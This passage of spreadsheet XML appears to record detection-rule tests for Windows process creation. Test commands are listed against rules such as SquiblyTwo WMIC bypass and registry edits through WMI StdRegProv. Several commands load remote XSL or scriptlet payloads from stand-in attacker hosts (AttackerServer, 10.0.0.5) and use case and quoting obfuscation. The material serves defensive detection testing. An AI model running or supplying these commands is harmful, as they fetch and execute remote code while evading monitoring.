          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1388" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1388" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1388" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1388" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1389" ht="15.75" customHeight="1" s="42">
      <c r="A1389" s="43" t="n"/>
      <c r="B1389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1389" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1389" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1389" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F1389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1389" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1390" ht="15.75" customHeight="1" s="42">
      <c r="A1390" s="43" t="n"/>
      <c r="B1390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1390" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1390" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1390" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F1390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1390" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1390" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1391" ht="15.75" customHeight="1" s="42">
      <c r="A1391" s="43" t="n"/>
      <c r="B1391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1391" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1391" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1391" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F1391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1391" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1392" ht="15.75" customHeight="1" s="42">
      <c r="A1392" s="43" t="n"/>
      <c r="B1392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1392" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1392" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1392" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F1392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1392" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1393" ht="15.75" customHeight="1" s="42">
      <c r="A1393" s="43" t="n"/>
      <c r="B1393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1393" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1393" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1393" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1393" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1394" ht="15.75" customHeight="1" s="42">
      <c r="A1394" s="43" t="n"/>
      <c r="B1394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1394" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1394" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1394" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1394" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1394" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1395" ht="15.75" customHeight="1" s="42">
      <c r="A1395" s="43" t="n"/>
      <c r="B1395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1395" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1395" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1395" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1395" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1395" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1395" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1396" ht="15.75" customHeight="1" s="42">
      <c r="A1396" s="43" t="n"/>
      <c r="B1396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1396" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1396" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1396" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1396" s="43" t="n"/>
      <c r="J1396" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1396" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1397" ht="15.75" customHeight="1" s="42">
      <c r="A1397" s="43" t="n"/>
      <c r="B1397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1397" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1397" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1397" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1397" s="43" t="n"/>
      <c r="J1397" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1397" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1398" ht="15.75" customHeight="1" s="42">
      <c r="A1398" s="43" t="n"/>
      <c r="B1398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1398" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1398" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1398" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1398" s="43" t="n"/>
      <c r="J1398" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1398" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1399" ht="15.75" customHeight="1" s="42">
      <c r="A1399" s="43" t="n"/>
      <c r="B1399" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1399" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1399" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1399" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1399" s="43" t="n"/>
      <c r="J1399" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1399" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1400" ht="15.75" customHeight="1" s="42">
      <c r="A1400" s="43" t="n"/>
      <c r="B1400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1400" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1400" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1400" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1400" s="43" t="n"/>
      <c r="J1400" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1400" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1401" ht="15.75" customHeight="1" s="42">
      <c r="A1401" s="43" t="n"/>
      <c r="B1401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1401" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1401" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1401" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1401" s="43" t="n"/>
      <c r="J1401" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1401" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1402" ht="15.75" customHeight="1" s="42">
      <c r="A1402" s="43" t="n"/>
      <c r="B1402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1402" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1402" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1402" s="44" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1402" s="43" t="n"/>
      <c r="J1402" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1402" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1403" ht="15.75" customHeight="1" s="42">
      <c r="A1403" s="43" t="n"/>
      <c r="B1403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C1403" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D1403" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E1403" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F1403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1403" s="4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1403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1403" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1404" ht="15.75" customHeight="1" s="42">
      <c r="A1404" s="43" t="n"/>
      <c r="B1404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1404" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1404" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1404" s="44" t="inlineStr">
        <is>
          <t>taskkill /f /im explorer.exe &amp;&amp; timeout /t 5 &amp;&amp; start explorer.exe</t>
        </is>
      </c>
      <c r="F1404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1404" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1404" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1404" s="44" t="n"/>
      <c r="J1404" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1404" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1405" ht="15.75" customHeight="1" s="42">
      <c r="A1405" s="43" t="n"/>
      <c r="B1405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1405" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1405" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1405" s="43" t="inlineStr">
        <is>
          <t>powershell.exe "Get-WmiObject -Class Win32_Product | Where-Object {$_.Name -like '*ApplicationName*'} | ForEach-Object {$_.Uninstall()}"</t>
        </is>
      </c>
      <c r="F1405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1405" s="43" t="n"/>
      <c r="J1405" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1405" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1406" ht="15.75" customHeight="1" s="42">
      <c r="A1406" s="43" t="n"/>
      <c r="B1406" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1406" s="43" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1406" s="43" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1406" s="43" t="inlineStr">
        <is>
          <t>regsvr32 /s /u C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1406" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1406" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1406" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1407" ht="15.75" customHeight="1" s="42">
      <c r="A1407" s="44" t="n"/>
      <c r="B1407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1407" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1407" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1407" s="43" t="inlineStr">
        <is>
          <t>regsvr32 -"s" /U C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1407" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1407" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1407" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1407" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1407" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1408" ht="15.75" customHeight="1" s="42">
      <c r="A1408" s="43" t="n"/>
      <c r="B1408" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1408" s="43" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1408" s="43" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1408" s="43" t="inlineStr">
        <is>
          <t>regsvr32 -"s" /"u" C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1408" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1408" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1408" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1408" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1408" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1409" ht="15.75" customHeight="1" s="42">
      <c r="A1409" s="44" t="n"/>
      <c r="B1409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1409" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1409" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1409" s="43" t="inlineStr">
        <is>
          <t>regsvr32 /S -"u" C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1409" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1409" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1409" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1409" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1409" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1410" ht="15.75" customHeight="1" s="42">
      <c r="A1410" s="43" t="n"/>
      <c r="B1410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1410" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1410" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1410" s="44" t="inlineStr">
        <is>
          <t>regsvr32 -s /U C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1410" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1410" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1410" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1410" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1411" ht="15.75" customHeight="1" s="42">
      <c r="A1411" s="43" t="n"/>
      <c r="B1411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1411" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1411" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1411" s="44" t="inlineStr">
        <is>
          <t>regsvr32 /"s" -u C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1411" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1411" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1411" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1411" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1411" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1412" ht="15.75" customHeight="1" s="42">
      <c r="A1412" s="43" t="n"/>
      <c r="B1412" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_application</t>
        </is>
      </c>
      <c r="C1412" s="44" t="inlineStr">
        <is>
          <t>Application Removed Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1412" s="44" t="inlineStr">
        <is>
          <t>b53317a0-8acf-4fd1-8de8-a5401e776b96</t>
        </is>
      </c>
      <c r="E1412" s="44" t="inlineStr">
        <is>
          <t>regsvr32 /S /U C:\Path\To\Uninstall.dll</t>
        </is>
      </c>
      <c r="F1412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1412" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1412" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1412" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J1412" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1412" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1413" ht="15.75" customHeight="1" s="42">
      <c r="A1413" s="43" t="n"/>
      <c r="B1413" s="44" t="inlineStr">
        <is>
